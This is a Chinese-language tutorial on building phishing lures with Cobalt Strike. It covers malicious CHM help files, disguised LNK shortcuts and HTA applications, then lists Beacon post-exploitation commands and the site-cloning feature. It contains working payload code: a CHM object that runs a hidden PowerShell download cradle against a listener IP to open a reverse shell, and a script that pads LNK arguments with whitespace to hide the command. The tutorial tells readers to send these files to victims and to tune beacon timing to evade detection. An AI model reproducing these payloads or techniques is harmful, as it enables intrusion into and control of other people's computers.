Cobalt Strike之CHM、LNK、HTA钓鱼

CHM钓鱼

CHM介绍

CHM（Compiled Help Manual）即“已编译的帮助文件”。它是微软新一代的帮助文件格式，利用HTML作源文，把帮助内容以类似数据库的形式编译储存。
利用CHM钓鱼主要原因是因为该文档可以执行cmd命令

这里制作CHM需要用到一个工具就是 EasyCHM

CHM制作过程：
创建一个文件夹（名字随意），在文件夹里面再创建两个文件夹（名字随意）和一个index.html文件，在两个文件夹内部创建各创建一个index.html文件。

先将下列代码复制到根文件夹中的index.html中。

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

打开我们的EasyCHM工具

后点击新建

然后导入自己创建的文件夹，点击确定后再点击编译，在弹出的对话框中点击生成CHM按钮

它会给你生产一个CHM文件，给别人发过去，一旦点击就会给弹出计算机

生产钓鱼文件

启动Cobalt Strike，点击attacks——>web Drive by——>scripted web Delivery在弹出的对话框中将type类型设置为powershell然后单击launch按钮

再用代码将上面创建的根文件夹中的index.html代码中的calc.exe替换掉。

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.209.151:81/aa'))">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

生产CHM发送给别人，点击后获得反弹的shell

LNK钓鱼

lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件，通常它以快捷方式放在硬盘上，以方便使用者快速的调用。
lnk钓鱼主要将图标伪装成正常图标，但是目标会执行shell命令。

先做个简单的powershell生产图标：
创建个txt文本写入下面代码然后改文件后缀名为.ps1。

cmd /c calc.exe

右键文件powershell运行后会弹出计算器

钓鱼方法：

首先通过Cobalt Strike的attacks——>web Drive by——>scripted web Delivery

tpye类型为powershell，然后单机launch。生产代码。

还记的上面做的那个简单的powershell么，后缀改回txt，将生成的代码替换掉calc.exe

将下面的powershell代码写入.ps1文件，右键运行powershell。

$file = Get-Content "test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '                                                                                                                                                                                                                                    '+ $file
$Shortcut.Save()

生成test.lnk文件，而且图标改了（powershell执行文件要和test.txt要在一个目录下，这个图标所在位置就在%SystemRoot%\System32\Shell32.dll目录下）

后将test.lnk发送给他人，获得反弹shell。

HTA钓鱼

HTA是HTML Application的缩写，直接将HTML保存成HTA的格式，是一个独立的应用软件。
HTA虽然用HTML、JS和CSS编写，却比普通网页权限大得多，它具有桌面程序的所有权限。
就是一个html应用程序，双击就能运行。

Cobalt Strike，attacks——>packages——>HTML application

选择powershell然后单机generate，选择保存路径。

将生成的.hta文件发送给别人，点击后获得shell

后渗透阶段

相信你已经能拿到一个beacon的shell了。

下面是一些基本的使用命令，但是cs监听器对中文支持并不友好，会对中文产生乱码。

help 查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样,eg: help checkin
note 给当前目录机器起个名字, eg: note beacon-shell
cd 在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用'/' eg: cd c:\\
mkdir 新建目录, eg: mkdir d:\\beacon
rm 删除文件或目录, eg: rm d:\\beacon
upload 上传文件到目标系统中
download 从目标系统下载指定文件,eg: download C:\\Users\\win7cn\\Desktop\\putty.exe
cancel 取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下
shell 在目标系统中执行指定的cmd命令, eg: shell whoami
getuid 查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权
pwd 查看当前在目录系统中的路径
ls 列出当前目录下的所有文件和目录
drives 列表出目标系统的所有分区[win中叫盘符]
ps 查看目标系统当前的所有的进程列表
kill 杀掉指定进程, eg: kill 4653
sleep 10 指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可
jobs 列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除
jobkill 如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, eg: jobkill 1345
clear 清除beacon内部的任务队列
checkin 强制让被控端回连一次
exit 终止当前beacon 会话
ctrl + k 清屏

有些可能会触发敏感api导致防护报警,另外进程注入,被控端可能感到非常明显的卡顿,工具也有许多不完善的地方

网站克隆

Cobalt Strike还能够实现网站克隆
cotalt strike能够快速复制目标网站前端页面，并且复制相识度极高
cotalt strike同时还可以在复制的网站中插入恶意代码，如果本地浏览器带有漏洞的用户，可以直接控制目标机器。
点击attacks——>Web Drive-by——>Clone site

Clone URL：克隆目标网站的URL（如果网站不是80端口的话域名后得跟上端口号。）
注意问题：URL需要添加http协议和端口（81）
Local URL：本地克隆路径
Local Host：本地主机IP
Local Port：本地端口
Attack：克隆后目标网站执行脚本，如：flash漏洞